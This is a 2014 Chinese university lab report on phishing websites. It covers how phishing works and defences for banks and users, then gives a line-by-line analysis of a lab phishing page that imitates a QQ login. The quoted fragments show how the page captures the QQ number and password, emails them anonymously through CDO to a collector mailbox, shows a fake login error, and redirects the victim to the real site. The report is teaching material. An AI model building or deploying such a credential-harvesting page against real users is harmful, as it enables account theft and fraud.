钓鱼实验三网站钓鱼攻击实验报告分析

南京工程学院

实验报告

题 目 网站钓鱼攻击

课程名称

计算机工程学院

业

班

生姓名

学

导教师

毛云贵

实

验时间

2014年3月20日

实

验成绩

1

一实验目的

1. 了解钓鱼攻击的概念和实现原理

2. 了解钓鱼网站和正常网站的区别

3.提高抵御钓鱼攻击的能力

二实验环境

Windows 交换网络结构 UltraEdit

三实验原理

3.1 什么是钓鱼网站

网络钓鱼是通过大量发送声称来自于银行或其他知名机构的欺骗性垃圾邮件意图引诱收信人给出敏感信息如用户名、 口令、帐号 ID、 ATMPIN码或信用卡详细信息的一种攻击方式。 最典型的网络钓鱼攻击将收信人引诱到一个通过精心设计与目标组织的网站非常相似的钓鱼网站上 并获取收信人在此网站上输入的个人敏感信息 通常这个攻击过程不会让受害者警觉。 这些个人信息对黑客们具有非常大的吸引力 因为这些信息使得他们可以假冒受害者进行欺诈性金融交易 从而获得经济利益。 受害者经常遭受严重的经济损失或个人信息被窃取。

钓鱼网站通常伪装成为银行网站窃取访问者提交的账号和密码信息。它一般通过电子邮件传播此类邮件中包含一个经过伪装的链接 该链接将收件人链接到钓鱼网站。 钓鱼网站的页面与真实网站界面完全一致 要求访问者提交账号和密码。 一般来说钓鱼网站结构很简单只是一个或几个页面 URL和真实网站有细微差别如真实的工行网站为www. icbc.com.cn 针对工行的钓鱼网站则可能为 www.1 cbc.com.cn 。

3.2 钓鱼网站的防范措施

1.启用专用域名

现在的网址有好几种 www.xxx.co m是一个商业性网站而 www.xxx.gov是政府网

2

站 www.xxx.org则是非政府组织网站。域名不同代表的意思也不同。 因此可以借鉴政府网站有专用域名做法 为网上银行设置专用域名。 这种作法虽然从根本上无法杜绝钓鱼网站的存在但确实在很大程度上打击了假冒的网银网站。

2.规范搜索引擎

在网银安全问题上银行惟一能采取的办法就是投入大量的人力物力不间断地在网上通过人工或是自动搜索同自己域名类似的假冒网站、 网络实名甚至必须介入电子邮件搜索是否有人假借银行名义行欺骗之实即使是几个银行联合起来打假平摊的只是成本技术始终是个难题。 因此可以规范搜索引擎 从搜索引擎层面上来干预与网上银行域名类似的网站。

3.银行数字证书

银行可以通过使用银行证书的方式来验明网上银行的正身只有拥有正确的证书才能证明该网站是正确的网上银行而不是钓鱼网站。

4.客户安全使用网银

 1 避免使用搜索引擎

从正规银行网点取得网络银行网址并牢记登录网银时尽量避免使用搜索引擎或网络实名以免混淆视听。

 2设置混合密码、双密码

密码设置应避免与个人资料相关建议选用数字、字母混合密码提高密码破解难度并妥善保管交易密码尽量与信用卡密码不同。

 3定期查看交易记录

定期查看网银办理的转帐和支付等业务记录 或通过短信定制账户变动通知 随时掌握账户变动情况。

3

 4妥善保管数字证书

避免在公用计算机上使用网银以防数字证书等机密资料落入他人之手。

 5警惕电子邮件链接

网上银行一般不会通过电子邮件发出“系统维护、升级”提示若遇重大事件系

统必须暂停服务 银行会提前公告顾客。 一旦发现资料被盗 应立即修改相关交易密码或进行银行卡挂失。

三钓鱼网站的关键源码分析

钓鱼网站的位置: “C: 钓鱼网站 qqqet ” 用UltraEdit-32 可查看或编辑源码。

钓鱼网站构造比较简单主要组成部分其实就是两个文件 index.htm  steal .asp 。index.htm 为钓鱼网站的前台表现页面 steal .asp 为钓鱼网站的后台控制程序。具体分析一下这两个文件。

1 . index.htm 文件

用户使用域名“www.qqqet.qq.com”登录钓鱼网站后 进入的页面就是 index.htm 该页是钓鱼网站的表现页面 其主要完成表单提交 用户信息是否为空的验证 验证用户信息不为空的话就将用户输入的信息传入 steal .asp 。页面源码中很多都是为页面的表现形式表现效果服务的这些源码不做分析。下面分析一下关键代码

上行代码解析:

 1  “name”是表单的名称这里给该表单命名为“ form1 ”。

 2 “onsubmit="returncheckinput()" ”是提交表单之前执行的方法在下一大

4

段代码中会具体介绍 checkinput() 方法。

 3 “action=steal .asp ”是提交表单后跳转的文件这里是跳转到 steal .asp 。 4 “method=post”是表单提交方法该方法有两种一种是 post 一种是get 。post是隐含参数提交 就是提交的时候 url 中不显示用户名 密码信息。 get是显示参数提交就是提交的时候 url 中显示用户名密码信息。

上段代码解析:

 1  “if(document.form1 .u.value=="") ”if 条 件 判 断 “document.form1 .u.value ”是取得文本框中内容也就是 QQ号码对它进行判断判断它的内容是不是空值如果是空值就执行下面 {}中的内容。

 2 “alert("您还没有输入QQ号码") ”alert是弹出对话框对话框的内容是“您还没有输入QQ号码”。

 3 “document.form1 .u.focus() ”将鼠标焦点定位到文本框的位置。

 4  “return false”返回值是“false” 即不提交表

单内容返回“index.htm”。

2.steal .asp 文件

用户提交表单后将用户信息传入 steal .asp 中在steal .asp 中进行业务逻辑处理。

具体处理的内容将用户信息以邮件的形式发送到指定邮箱弹出误导对话框

引导到正常网站。关键代码解析

6

上段关键代码解析

 1  “NameSpace="http://schemas.microsoft.com/cdo/configuration/" ”定义

NameSpace命名空间。

 2 “Set Emai l=CreateObject("CDO.Message") ”开启邮件服务。

 3 “Emai l .From="anyone@CServer.NetLab" ”邮件发送方的邮箱。

 4 “Emai l .To="xxxxx@CServer.NetLab" ”邮件接收方的邮箱。

 5 “Emai l .Subject="username and password" ”发送邮件的主题。

 6 “Emai l .Textbody="username:"&u&" "& "password:"&p ”发送邮

件的具体内容即 username:“用户的 QQ号码”  password: “用户的 QQ密码”。

 7 “ Item(NameSpace&"smtpse rver")=" 172.16.0.254" ”接收邮件的服务器。

 8 “ Item(NameSpace&"smtpauthenticate") =0”设置邮件发送者是否为匿名用

户发送设置为 0则为匿名用户发送若设置为 0则1则为真实存在的用户发送发送者的邮箱邮箱的用者的邮箱) 。设置为 户名密码必须

是真实存在的 即“Emai l .From” 

“Item(NameSpace&"sendusername")” 

“Item(NameSpace&"sendpassword") ”必须设置真实存

在的邮箱名 邮箱用户名邮箱密码。

此处作为攻击用必须设置为 0。

 9 “Item(NameSpace&"sendpassword") = "any" ”邮件发送者的邮箱用户名  因为

“Item(NameSpace&"smtpauthenticate") ”设置为 0了。

 10 “Update”将上面设置的内容在程序执行的时候更新确认。

 1 1  “Emai l .Send”邮件发送出去。

上段代码很多处都是 html 标签用于网页显示。关键代码是 javascript

部分解析如下

 1  “al e rt("用户名或密码输入错误!") ”弹出提示对话框对话框内容是“用户名或密码输

入错误 ”。

 2 “window. location="http://www.qqpet.qq.com";”将用户引导到正常网站

用的是javascript 中“window. location ”方法。用法就是 window. location= “要跳转到

的地址域名或 ip地址 ”。